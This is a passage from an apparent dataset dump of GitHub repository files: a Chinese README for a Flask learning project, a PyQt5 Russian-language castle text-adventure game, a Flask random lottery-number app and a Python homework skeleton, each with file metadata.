"text": "3.18 main.py删除了qwq抱歉让你们看到肥宅了呜呜已经爬了\n#\n3.17 push错项目了aaa我这是push了个什么蠢萌的东西qwq等我回去改一下qwqqwq\n# \n跟随<a href=\"https://space.bilibili.com/43276908\" target=\"_blank\">落拓</a>的<a href=\"https://www.bilibili.com/video/BV1NA411t7gu\" target=\"_blank\">教程一</a>、<a href=\"https://www.bilibili.com/video/BV1Fz4y1d7kc\" target=\"_blank\">教程二</a>、<a href=\"https://www.bilibili.com/video/BV1nV41117fS\" target=\"_blank\">教程三</a>进行的简单后端服务的搭建,学习基本SQL语句及CRUD的使用。使用flask框架和python自带的sqlite数据库,使用tableplus进行数据库可视化管理,使用postman进行模拟html请求的发送。\n\n"
}
] | 2 |
Sergey2004-cpu/Saratov-Karpov
|
https://github.com/Sergey2004-cpu/Saratov-Karpov
|
3962d864fe18b19900734b30033f4c3fbabdbb0d
|
371d05fb967d8da97abd51df9c4f4972d8963ae2
|
78f6120032a8b543e1442db70793edfc1eb79e06
|
refs/heads/master
| 2020-12-04T14:37:42.743411 | 2020-01-09T17:05:04 | 2020-01-09T17:05:04 | 231,803,070 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5536574125289917,
"alphanum_fraction": 0.5705900192260742,
"avg_line_length": 32.640506744384766,
"blob_id": "e10380c37c7b9211d7cd6c891e1b6178eedfd0e6",
"content_id": "886636ec5c63a238f103f24c5d3693af9358fc50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 28278,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 790,
"path": "/mainfile.py",
"repo_name": "Sergey2004-cpu/Saratov-Karpov",
"src_encoding": "UTF-8",
"text": "import sys\n\nfrom PyQt5.QtCore import QRect, QPoint\nfrom PyQt5.QtWidgets import QApplication, QWidget, QMainWindow\nfrom ui_file import Ui_MainWindow\nfrom ui_file2 import Ui_MainWindow2\nfrom ui_file3 import Ui_MainWindow3\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QPixmap\nimport sqlite3\nimport random\nfrom PyQt5 import QtGui\n\n\nclass MainWindow(QMainWindow, Ui_MainWindow, QWidget):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.pushButton.clicked.connect(self.openfunction)\n\n def openfunction(self):\n self.second_form = SecondWindow(self)\n self.second_form.show()\n\n\n\n\n\nclass SecondWindow(QMainWindow, Ui_MainWindow2):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.pushButton.clicked.connect(self.closefunction)\n self.pushButton_2.clicked.connect(self.openfunction1)\n self.pushButton_4.clicked.connect(self.openfunction2)\n self.pushButton_3.clicked.connect(self.openfunction3)\n\n def closefunction(self):\n self.close()\n\n def openfunction1(self):\n self.second_form = ThirdWindow(self)\n self.second_form.show()\n self.close()\n\n\n def openfunction2(self):\n self.third_form = ToweroneWindow(self)\n self.third_form.show()\n self.close()\n\n def openfunction3(self):\n self.fourth_form = TronWindow(self)\n self.fourth_form.show()\n self.close()\n\n\nclass ThirdWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton.clicked.connect(self.closefunction)\n self.pushButton_2.clicked.connect(self.openfunction1)\n self.pushButton_3.clicked.connect(self.openfunction2)\n\n\n pixmap = QPixmap('Podzemele_11-1180x664.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n\n\n def closefunction(self):\n self.close()\n\n def openfunction1(self):\n self.second_form = ForthWindow(self)\n self.second_form.show()\n self.close()\n\n def openfunction2(self):\n self.second_form = FifthWindow(self)\n self.second_form.show()\n self.close()\n\n\n\n\n\nclass ForthWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton.clicked.connect(self.closefunction)\n self.pushButton_2.clicked.connect(self.openfunction1)\n self.pushButton_3.clicked.connect(self.openfunction2)\n pixmap = QPixmap('cropped-metal-and-stone-spiral-staircase-1024x614.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''С каждым шагом вы спускаетесь всё ниже и ниже. И вдруг начинаете слышать голоса. \n Это голоса узников замка, которые заключены в подземельях. Вы можете спасти их. 
Но Стоит ли это делать? ''')\n self.pushButton_2.setText('Спасти')\n self.pushButton_3.setText('Подняться наверх')\n self.flag = True\n\n\n def closefunction(self):\n self.close()\n\n def openfunction1(self):\n self.second_form = SixWindow(self)\n self.second_form.show()\n self.close()\n\n def openfunction2(self):\n self.second_form = SevenWindow(self)\n self.second_form.show()\n self.close()\n\n\nclass FifthWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.pushButton.clicked.connect(self.closefunction)\n self.pushButton_2.clicked.connect(self.openfunction1)\n self.pushButton_3.clicked.connect(self.openfunction2)\n pixmap = QPixmap('qwert.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Перед вами Развилка. Куда пойдёте?''')\n self.pushButton_2.setText('Налево')\n self.pushButton_3.setText('Направо')\n self.flag = True\n\n def closefunction(self):\n self.close()\n\n def openfunction1(self):\n self.second_form = ForthWindow(self)\n self.second_form.show()\n self.close()\n\n def openfunction2(self):\n self.second_form = NewWindow(self)\n self.second_form.show()\n self.close()\n\n\n\nclass SixWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.pushButton.clicked.connect(self.closefunction)\n self.pushButton_2.clicked.connect(self.openfunction1)\n self.pushButton_3.clicked.connect(self.openfunction2)\n pixmap = QPixmap('565184067a7e2_DSC05695.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Они вам очень благодарны. Узники рассказали вам, что хозяин замка \nочень жесток и просто так вам не выбраться. 
Бежать с ними?''')\n self.pushButton_2.setText('Да')\n self.pushButton_3.setText('Нет')\n\n def closefunction(self):\n self.close()\n\n def openfunction1(self):\n self.second_form = EWindow(self)\n self.second_form.show()\n self.close()\n\n def openfunction2(self):\n self.second_form = NWindow(self)\n self.second_form.show()\n self.close()\n\n\nclass SevenWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.pushButton.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.openfunction1)\n self.pushButton_2.clicked.connect(self.openfunction2)\n pixmap = QPixmap('3261190647_05e748b932_o.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Они в ярости. Вам приходится убежать и вы поднимаетесь наверх, перед вами двери тронного зала.''')\n self.pushButton_2.setText('Остаться')\n self.pushButton_3.setText('Бежать из замка')\n\n def closefunction(self):\n self.close()\n\n def openfunction1(self):\n self.second_form = TWindow(self)\n self.second_form.show()\n self.close()\n\n def openfunction2(self):\n self.second_form = TronWindow(self)\n self.second_form.show()\n self.close()\n\n\nclass EWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.pushButton.clicked.connect(self.closefunction)\n self.pushButton_2.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.closefunction)\n pixmap = QPixmap('499176_pole_razrushennyj-zamok_tuchi_pejzazh_4000x2500_www.Gde-Fon.com.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Вы сбежали вместе с заключенными из замка. они спасли вам жизнь.\nВы решили никогда больше не возвращиться в тот замок. 
И правильно сделали.''')\n self.pushButton_2.setText('Завершить')\n self.pushButton_3.setText('Завершить')\n\n def closefunction(self):\n self.close()\n\nclass NWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.pushButton.clicked.connect(self.closefunction)\n self.pushButton_2.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.closefunction)\n pixmap = QPixmap('1441290094_dungeon-cave-hydra.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Очень жаль. Ведь позже в подземелье вам вас укусила змея и вы мучительно погибли.''')\n self.pushButton_2.setText('Завершить')\n self.pushButton_3.setText('Завершить')\n\n def closefunction(self):\n self.close()\n\nclass ToweroneWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.openfunction1)\n self.pushButton_3.clicked.connect(self.openfunction2)\n pixmap = QPixmap('preview.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''В башне Дракон охраняет принцессу. Вы можете сразиться с драконом или спусться в тронный зал''')\n self.pushButton_2.setText('Сразиться')\n self.pushButton_3.setText('Бежать')\n\n def openfunction1(self):\n self.second_form = PrinWindow(self)\n self.second_form.show()\n self.close()\n\n def openfunction2(self):\n self.second_form = StWindow(self)\n self.second_form.show()\n self.close()\n\n\nclass TWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.closefunction)\n pixmap = QPixmap('unnamed.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Вы сбежали из замка. 
На этом квест завершён.''')\n self.pushButton_2.setText('Завершить')\n self.pushButton_3.setText('Завершить')\n\n def closefunction(self):\n self.close()\n\nclass PrinWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.openfunction1)\n self.pushButton_3.clicked.connect(self.openfunction2)\n pixmap = QPixmap('the-alluring-charm-of-15th-century-antique-elm-chests-31-BI1.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Вы победили дракона. Перед вами открылась тайная комната. В ней стоит очень странный сундук.''')\n self.pushButton_2.setText('Открыть')\n self.pushButton_3.setText('Уйти')\n\n def closefunction(self):\n self.close()\n\n def openfunction1(self):\n self.second_form = TrWindow(self)\n self.second_form.show()\n self.close()\n\n def openfunction2(self):\n self.second_form = TronWindow(self)\n self.second_form.show()\n self.close()\n\nclass StWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.closefunction)\n pixmap = QPixmap('i.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Вы бежали вниз по скользкой лестнице и упали.\nочень жаль но вам не удалось выбраться живым из замка.''')\n self.pushButton_2.setText('Завершить')\n self.pushButton_3.setText('Завершить')\n\n def closefunction(self):\n self.close()\n\nclass TrWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.closefunction)\n pixmap = QPixmap('rare-horror-movies.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Вы открыли Сундук, я он оказался полон сокровищами.\nНо всё не так просто, ведь сундук, кроме дракона охранял скелет, он убивает вас. 
Лучше бы вы бежали.''')\n self.pushButton_2.setText('Завершить')\n self.pushButton_3.setText('Завершить')\n\n def closefunction(self):\n self.close()\n\n\nclass TronWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.openfunction1)\n self.pushButton_3.clicked.connect(self.openfunction2)\n pixmap = QPixmap('8c7d7a5090d9c5ee07f6ba86e061ac4e.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''После всех испытаний вы попали в тронный зал. Там вас уже ждёт король со своей стражей.\nОн наслышен о ваших приключениях и просит вас об услуге.''')\n self.pushButton_2.setText('Помочь королю')\n self.pushButton_3.setText('Отказать')\n\n def closefunction(self):\n self.close()\n\n def openfunction1(self):\n self.second_form = HelpWindow(self)\n self.second_form.show()\n self.close()\n\n def openfunction2(self):\n self.second_form = PrisonWindow(self)\n self.second_form.show()\n self.close()\n\n\nclass HelpWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.openfunction1)\n self.pushButton_3.clicked.connect(self.openfunction2)\n pixmap = QPixmap('22.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Вы решили помочь королю. Он просит спасти его дочь. Она заколдована.\nЧтобы ее вылечить нужно приготовить зелье. 
Вы умеете?''')\n self.pushButton_2.setText('Да')\n self.pushButton_3.setText('Нет')\n\n def closefunction(self):\n self.close()\n\n def openfunction1(self):\n self.second_form = ZWindow(self)\n self.second_form.show()\n self.close()\n\n def openfunction2(self):\n self.second_form = EndWindow(self)\n self.second_form.show()\n self.close()\n\n\nclass PrisonWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.closefunction)\n pixmap = QPixmap('prison_by_gregmks-d30mry0.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Очень жаль. Король не любит отказов. Вас схватили и отправили в темницу.\nЗавтра на рассвете вы будете казнены.''')\n self.pushButton_2.setText('Завершить')\n self.pushButton_3.setText('Завершить')\n\n def closefunction(self):\n self.close()\n\nclass ZWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.closefunction)\n pixmap = QPixmap('happy-end.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Вам повезло. Вы спасаете принцессу. 
Король отдаёт её вам в жёны\nи вы наследник всего королевства!''')\n self.pushButton_2.setText('Завершить')\n self.pushButton_3.setText('Завершить')\n\n def closefunction(self):\n self.close()\n\n\nclass EndWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.closefunction)\n pixmap = QPixmap('24869_1054353600.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Король в ярости, из-за того, что вы его подвели.\nВас выгнали из замка, но вы хотя бы живы.''')\n self.pushButton_2.setText('Завершить')\n self.pushButton_3.setText('Завершить')\n\n def closefunction(self):\n self.close()\n\nclass NewWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.closefunction)\n pixmap = QPixmap('2294958-8XPU3.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Ой, а тут ловушка. Вас поймали стражи замка. Теперь бежать уже не получиться.''')\n self.pushButton_2.setText('Завершить')\n self.pushButton_3.setText('Завершить')\n\n def closefunction(self):\n self.close()\napp = QApplication(sys.argv)\nex = MainWindow()\nex.show()\nsys.exit(app.exec_())\n"
}
] | 1 |
mikeypy/lottoNumbers
|
https://github.com/mikeypy/lottoNumbers
|
e8af0befc9352a4782f28b334f2571b59f04a54a
|
ea21ef89e19b34e6fd4bd2a9f33aa97ea73ad385
|
f077605ba190338b0f1f8b175ab8b845cf01be4a
|
refs/heads/master
| 2023-02-19T13:43:10.235160 | 2019-12-30T15:31:04 | 2019-12-30T15:31:04 | 164,925,382 | 0 | 0 | null | 2019-01-09T19:33:30 | 2019-12-30T15:31:07 | 2023-02-02T04:37:20 |
HTML
|
[
{
"alpha_fraction": 0.49571603536605835,
"alphanum_fraction": 0.5263158082962036,
"avg_line_length": 20.421052932739258,
"blob_id": "fb9729263239d00243f27b0366bb321e8b005a63",
"content_id": "ab88386773c95e3a333b755bbef678b4dc4459e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 817,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 38,
"path": "/app/views.py",
"repo_name": "mikeypy/lottoNumbers",
"src_encoding": "UTF-8",
"text": "from flask import render_template\nfrom app import app\nimport random\n\n\[email protected]('/')\[email protected]('/index')\n\ndef index():\n \"\"\"Index Page for Webapp\"\"\"\n special = {'num':random.randint(1,11), 'num2': random.randint(1,11)}\n numbers = [\n {\n 'one': random.randint(1,50),\n \n \n 'two': random.randint(1,50),\n \n \n 'three': random.randint(1,50),\n \n \n 'four': random.randint(1,50),\n \n \n 'five': random.randint(1,50)\n } \n ]\n #numbers = {'one':random.sample(range(50), 5)}\n return render_template('index.html', title='Home', numbers=numbers, special = special)\n\n\n\[email protected]('/about')\ndef about():\n \"\"\"About Page for Webapp\"\"\"\n \n return render_template('about.html', title='About')\n\n\n\n"
}
] | 1 |
effa/ib111
|
https://github.com/effa/ib111
|
65e00c63bd269445a0df02f867109431627541bc
|
6accd5c033ab14466055d9cc575a6cc472ae73d6
|
d79efcf4faa77b1db94fa96c6153fd7c09ac4675
|
refs/heads/master
| 2021-06-04T21:21:23.457987 | 2017-12-12T09:39:24 | 2017-12-12T09:39:24 | 23,517,533 | 4 | 2 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4494584798812866,
"alphanum_fraction": 0.5956678986549377,
"avg_line_length": 12.850000381469727,
"blob_id": "5dad964ad647d94bf2d8a7d97b54c213d29c4529",
"content_id": "1bc047298f29fd1230a73bf9ac27de4280c5fc84",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 554,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 40,
"path": "/homeworks/homework_01.py",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "def alternating_sequence(n, a, b):\n # Nahradte `pass` implementaci pozadovane funkce.\n pass\n\n\ndef selected_numbers(a, b):\n pass\n\n\ndef near_divisors(n):\n pass\n\n\ndef striped_rectangle(width, height):\n pass\n\n\ndef differences_table(n):\n pass\n\n\nalternating_sequence(10, 7, 1)\n# 7 1 14 1 21 1 28 1 35 1\n\nselected_numbers(3, 5)\n# 30 35 60 65 90 95\n\nnear_divisors(20)\n# 3 6 9 11 19 21\n\nstriped_rectangle(9, 6)\n\ndifferences_table(5)\n# 1 2 3 4 5\n# - - - - -\n# 1 | 0 1 2 3 4\n# 2 | 1 0 1 2 3\n# 3 | 2 1 0 1 2\n# 4 | 3 2 1 0 1\n# 5 | 4 3 2 1 0\n"
},
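For the first exercise in the skeleton above, the sample call `alternating_sequence(10, 7, 1)` pins down the expected behaviour exactly, so one possible solution sketch is:

```python
def alternating_sequence(n, a, b):
    """Print the first n terms: successive multiples of a alternating with b."""
    terms = []
    for i in range(n):
        if i % 2 == 0:
            terms.append(a * (i // 2 + 1))  # 1st, 2nd, 3rd, ... multiple of a
        else:
            terms.append(b)
    print(*terms)


alternating_sequence(10, 7, 1)  # 7 1 14 1 21 1 28 1 35 1
```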
{
"alpha_fraction": 0.6021825671195984,
"alphanum_fraction": 0.6145833134651184,
"avg_line_length": 25.295652389526367,
"blob_id": "f45a330b9b22fba3de8605c12006ac18a96c444e",
"content_id": "9a007c9d43659b363a25ea50c87f079a4d7b88f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6048,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 230,
"path": "/week11/week11.py",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
